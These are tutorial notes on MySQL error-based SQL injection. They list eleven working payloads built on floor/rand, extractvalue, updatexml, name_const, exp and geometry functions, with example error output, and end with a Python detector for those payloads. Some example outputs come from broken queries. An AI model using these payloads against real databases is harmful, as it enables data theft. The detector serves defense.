Error-based injection abuses a bug in the database and reads the resulting error message: the information we want is echoed back inside the error text.
A blog post that explains the principle of error-based injection in great detail: https://blog.csdn.net/he_and/article/details/80455884
concat(): joins two strings into a single string.
floor(): returns the largest integer less than or equal to its argument, i.e. rounds down, keeping only the integer part.
rand(): can be used to produce 0 or 1, but rand(0) and rand() differ fundamentally. rand(0) passes the argument 0 to rand() as a seed, and rand() then generates its numbers from that seed. rand() produces completely random numbers, while rand(0) produces a predictable, repeating sequence.
extractvalue(): a function that queries an XML document.
updatexml(): similar to extractvalue(); it updates an XML document.
Whenever count(*), rand() and group by are used together, this error is produced.
left(rand(),3) == does not always error
floor(rand(0)*2) == always errors
round(x,d) // x is the number to process, d is the number of decimal places to keep
Concat() // string concatenation
select count(*),(concat(floor(rand(0)*2),(select database())))xx from admin group by xx;
1. Error via floor(); injection statement:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
Example: select User from user where User=root and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1062 - Duplicate entry '5.5.531' for key 'group_key'
2. Error via extractvalue(); injection statement:
and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)));
Example: select User from user where User=root and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)));
1054 - Unknown column 'root' in 'where clause'
3. Error via updatexml(); injection statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1));
Example: select User from user where User=root and 1=(updatexml(1,concat(0x3a,(select user())),1));
1054 - Unknown column 'root' in 'where clause'
4. Error via name_const(); injection statement:
and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
Example: select User from user where 1=1 and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
1060 - Duplicate column name '5.5.53'
5. Error via join to reveal column names; injection statement (usable only when the database and table name are already known; in the template, 表名 stands for the table name and 已知的字段 for the columns already discovered):
select * from (select * from 表名 a join 表名 b using(已知的字段,已知的字段))c;
Example: select User from user where User=root and root=(select * from (select * from user a join user b )c);
1060 - Duplicate column name 'Host'
select User from user where User=root and root=(select * from (select * from user a join user b using(Host))c);
1060 - Duplicate column name 'User'
select User from user where User=root and root=(select * from (select * from user a join user b using(Host,User))c);
1060 - Duplicate column name 'Password'
6. Error via exp(); injection statement:
and exp(~(select * from (select user())a));
7. Error via geometrycollection(); injection statement:
and geometrycollection((select * from (select * from (select user())a)b));
8. Error via polygon(); injection statement:
and polygon((select * from(select * from(select user())a)b));
9. Error via multipoint(); injection statement:
and multipoint((select * from(select * from(select user())a)b));
10. Error via multilinestring(); injection statement:
and multilinestring((select * from (select * from (select user())a )b));
11. Error via multipolygon(); injection statement:
and multipolygon((select * from (select * from (select user())a)b));
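A defensive counterpart, added here and not part of the original notes: a small Python detector that flags the primitives listed above inside URL query strings and recognises the MySQL error messages that carry data back to the client. The signature names, the sample requests and the sample error lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the primitives listed above. The floor pattern
# requires rand(0)*2 together with group by; the geometry pattern requires a
# nested (select ...) argument, so ordinary spatial queries do not match.
PAYLOAD_SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?\bgroup\s+by\b", re.I | re.S),
    "xml_function": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "geometry_constructor": re.compile(r"\b(geometrycollection|polygon|multipoint|multilinestring|multipolygon)\s*\(\s*\(\s*select\b", re.I),
}

# Error-side signatures: 1062 and 1060 are the messages shown on this page;
# 1105 "XPATH syntax error" is what extractvalue()/updatexml() raise on a
# non-XPath argument. The captured group is the text that reached the client.
ERROR_SIGNATURES = {
    "1062_group_key": re.compile(r"Duplicate entry '([^']*)' for key 'group_key'"),
    "1060_dup_column": re.compile(r"Duplicate column name '([^']*)'"),
    "1105_xpath": re.compile(r"XPATH syntax error: '([^']*)'"),
}

def classify_request(raw_query: str) -> list[str]:
    """Names of the injection primitives present in a URL-encoded query string."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in PAYLOAD_SIGNATURES.items() if rx.search(decoded)]

def classify_error(message: str):
    """(signature, leaked_text) if a MySQL error message carries data, else None."""
    for name, rx in ERROR_SIGNATURES.items():
        m = rx.search(message)
        if m:
            return name, m.group(1)
    return None

# Constructed sample lines for this example, not real traffic.
SAMPLE_REQUESTS = [
    "id=1",
    "id=1+and+extractvalue(1,concat(0x5c,(select+table_name+from+information_schema.tables+limit+1)))",
    "id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
]
SAMPLE_ERRORS = [
    "1062 - Duplicate entry '5.5.531' for key 'group_key'",
    "1054 - Unknown column 'root' in 'where clause'",
]

if __name__ == "__main__":
    print([classify_request(q) for q in SAMPLE_REQUESTS], [classify_error(e) for e in SAMPLE_ERRORS])
```

Feed classify_request() the query string of each request line and classify_error() the messages your application logs; a hit on both sides for the same request is strong evidence that the error text, not just the payload, reached the client.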